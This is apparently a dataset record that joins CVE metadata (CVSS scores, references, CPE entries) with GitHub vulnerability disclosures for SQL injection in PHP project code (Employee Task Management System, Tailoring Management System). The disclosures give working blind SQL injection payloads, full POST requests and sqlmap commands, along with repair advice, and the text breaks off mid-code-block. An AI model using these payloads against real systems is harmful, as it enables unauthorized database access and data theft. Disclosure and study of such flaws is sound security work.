+ During the security review of " Employee Task Management System Web Project using PHP and MYSQL ", onupset discovered a critical SQL injection vulnerability in the "/Employee_Task_Management_System/source-code/PROJECT_NEW/admin/AdminLogin.php " file. This vulnerability stems from insufficient user input validation of the ' email ' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## ulnerability type:
+ time-based blind
+ boolean-based blind
## Vulnerability location:
+ ' email ' parameter
## Payload:
```bash
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-6206' OR 6833=6833-- iKZf&password=123&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=aditti@gmail.com' AND (SELECT 1299 FROM (SELECT(SLEEP(5)))vsIm)-- YAee&password=123&submit=
```
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r test.txt --batch --level=5 --risk=3 --dbs
```


# Suggested repair
1. Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| 1000projects Employee Task Management System Web Project using PHP and MYSQL V1.0 /Employee_Task_Management_System/source-code/PROJECT_NEW/admin/AdminLogin.php SQL injection | https://api.github.com/repos/onupset/CVE/issues/4/comments | 0 | 2025-01-20T06:53:03Z | 2025-01-20T06:54:17Z | https://github.com/onupset/CVE/issues/4 | 2,798,349,564 | 4 | 6,523 |
CVE-2025-0847 | 2025-01-30T02:15:25.403 | A vulnerability was found in 1000 Projects Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /index.php of the component Login. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://1000projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/onupset/CVE/issues/5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.294010"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.294010"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.485762"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:1000projects:employee_task_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0B00664-63AD-417B-8FF7-43F08F5162FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/onupset/CVE/issues/5 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"onupset",
"CVE"
] | # 1000projects Employee Task Management System Web Project using PHP and MYSQL
V1.0 /Employee_Task_Management_System/source-code/PROJECT_NEW/index.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Employee Task Management System Web Project using PHP and MYSQL
## Vendor Homepage
+ [homepage]( https://1000projects.org/employee-task-management-system-web-project-using-php-and-mysql.html)
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ onupset
## Vulnerable File
+/Employee_Task_Management_System/source-code/PROJECT_NEW/index.php
## VERSION(S)
+ V1.0
# Software Link
+ [Download Source Code]( https://1000projects.org/wp-content/uploads/2022/09/Employee_Task_Management_System.7z)
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the '/Employee_Task_Management_System/source-code/PROJECT_NEW/index.php' file of the ' Employee Task Management System Web Project using PHP and MYSQL ' project. The reason for this issue is that attackers inject malicious code from the parameter ' email ' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
## DESCRIPTION
+ During the security review of " Employee Task Management System Web Project using PHP and MYSQL ", onupset discovered a critical SQL injection vulnerability in the "/Employee_Task_Management_System/source-code/PROJECT_NEW/index.php " file. This vulnerability stems from insufficient user input validation of the ' email ' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## ulnerability type:
+ time-based blind
+ boolean-based blind
## Vulnerability location:
+ ' email ' parameter
## Payload:
```bash
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-6565' OR 5128=5128-- SWHI&password=1&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=1@W.COM' AND (SELECT 6650 FROM (SELECT(SLEEP(5)))ghHE)-- xExO&password=1&submit=
```
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r test.txt --batch --level=5 --risk=3 --dbs
```


# Suggested repair
1. Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| 1000projects Employee Task Management System Web Project using PHP and MYSQL V1.0 /Employee_Task_Management_System/source-code/PROJECT_NEW/index.php SQL injection | https://api.github.com/repos/onupset/CVE/issues/5/comments | 0 | 2025-01-20T07:03:45Z | 2025-01-20T07:08:44Z | https://github.com/onupset/CVE/issues/5 | 2,798,368,864 | 5 | 6,524 |
CVE-2025-0872 | 2025-01-30T16:15:30.737 | A vulnerability classified as critical has been found in itsourcecode Tailoring Management System 1.0. Affected is an unknown function of the file /addpayment.php. The manipulation of the argument id/amount/desc/inccat leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/magic2353112890/cve/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://itsourcecode.com/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.294066"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.294066"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.487953"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/magic2353112890/cve/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"magic2353112890",
"cve"
] | # Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addpayment.php POST parameter SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Tailoring Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ lyp123
## Vulnerable File
+ addpayment.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'addpayment.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that an attacker injects malicious code from an arbitrary POST parameter and uses it directly in SQL queries without proper sanitization or validation. This allows an attacker to forge input values to manipulate SQL queries and perform unauthorized actions.
<img width="735" alt="1" src="https://github.com/magic2353112890/photo/blob/main/3-1.png?raw=true" />
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ A critical SQL injection vulnerability was found in "Tailoring Management System Project in PHP With Source Code" due to insufficient validation of the POST parameter entered by the user, allowing an attacker to inject malicious SQL queries. As a result, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial action is required to secure the system and protect data integrity.
# Vulnerability details and POC
```
POST /tailor/addpayment.php HTTP/1.1
Host: localhost
Content-Length: 40
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/tailor/addpayment.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0ut1k1epqdba6pad7kkkacdub6
Connection: close
amount=1&date=2025-01-23&desc=2&inccat=1
```
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'amount','desc','inccat' parameter
## Payload:
```
Parameter: amount (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: amount=1' AND (SELECT 3613 FROM (SELECT(SLEEP(5)))mJtE) AND 'eDZA'='eDZA&date=2025-01-23&desc=1&inccat=1
Parameter: desc (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: amount=1&date=2025-01-23&desc=1' AND (SELECT 7643 FROM (SELECT(SLEEP(5)))wVhp) AND 'ugSH'='ugSH&inccat=1
Parameter: inccat (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: amount=1&date=2025-01-23&desc=1&inccat=1' AND (SELECT 8371 FROM (SELECT(SLEEP(5)))BoXa) AND 'frFl'='frFl
```
<img width="656" alt="2" src="https://github.com/magic2353112890/photo/blob/main/3-2.png?raw=true" />
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -r 1.txt -p amount –current-db --batch
python sqlmap.py -r 1.txt -p desc –current-db --batch
python sqlmap.py -r 1.txt -p inccat –current-db --batch
```
<img width="491" alt="3" src="https://github.com/magic2353112890/photo/blob/main/3-3.png?raw=true" />
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addpayment.php POST parameter SQL injection | https://api.github.com/repos/magic2353112890/cve/issues/3/comments | 0 | 2025-01-23T07:47:55Z | 2025-01-23T08:59:52Z | https://github.com/magic2353112890/cve/issues/3 | 2,806,173,967 | 3 | 6,526 |
CVE-2025-0873 | 2025-01-30T17:15:18.293 | A vulnerability classified as critical was found in itsourcecode Tailoring Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /customeredit.php. The manipulation of the argument id/address/fullname/phonenumber/email/city/comment leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/magic2353112890/cve/issues/5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://itsourcecode.com/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.294067"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.294067"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.487984"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/magic2353112890/cve/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"magic2353112890",
"cve"
] | # Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 customeredit.php POST parameter SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Tailoring Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ lyp123
## Vulnerable File
+ customeredit.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'customeredit.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that an attacker injects malicious code from an arbitrary POST parameter and uses it directly in SQL queries without proper sanitization or validation. This allows an attacker to forge input values to manipulate SQL queries and perform unauthorized actions.
<img width="735" alt="1" src="https://github.com/magic2353112890/photo/blob/main/5-1.png?raw=true" />
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ A critical SQL injection vulnerability was found in "Tailoring Management System Project in PHP With Source Code" due to insufficient validation of the POST parameter entered by the user, allowing an attacker to inject malicious SQL queries. As a result, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial action is required to secure the system and protect data integrity.
# Vulnerability details and POC
```
POST /tailor/customeredit.php?id=15 HTTP/1.1
Host: localhost
Content-Length: 65
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/tailor/customeredit.php?id=15
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0ut1k1epqdba6pad7kkkacdub6
Connection: close
fullname=1&address=1&city=1&phonenumber=1&email=1&comment=1&sex=0
```
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'fullname','address','city','phonenumber','email','comment' parameter
## Payload:
```
Parameter: phonenumber (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=1&address=1&city=1&phonenumber=1' AND (SELECT 8719 FROM (SELECT(SLEEP(5)))BlUf) AND 'nsHW'='nsHW&email=1&comment=1&sex=0
Parameter: address (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=1&address=1' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))YIAm) AND 'ivqf'='ivqf&city=1&phonenumber=1&email=1&comment=1&sex=0
Parameter: fullname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=1' AND (SELECT 2263 FROM (SELECT(SLEEP(5)))vucK) AND 'PQYG'='PQYG&address=1&city=1&phonenumber=1&email=1&comment=1&sex=0
Parameter: comment (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=1&address=1&city=1&phonenumber=1&email=1&comment=1' AND (SELECT 6529 FROM (SELECT(SLEEP(5)))XEVf) AND 'VrDo'='VrDo&sex=0
Parameter: city (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=1&address=1&city=1' AND (SELECT 2078 FROM (SELECT(SLEEP(5)))Cvlo) AND 'eLwo'='eLwo&phonenumber=1&email=1&comment=1&sex=0
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=1&address=1&city=1&phonenumber=1&email=1' AND (SELECT 8388 FROM (SELECT(SLEEP(5)))hLYv) AND 'Uukg'='Uukg&comment=1&sex=0
```
<img width="656" alt="2" src="https://github.com/magic2353112890/photo/blob/main/5-2.png?raw=true" />
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
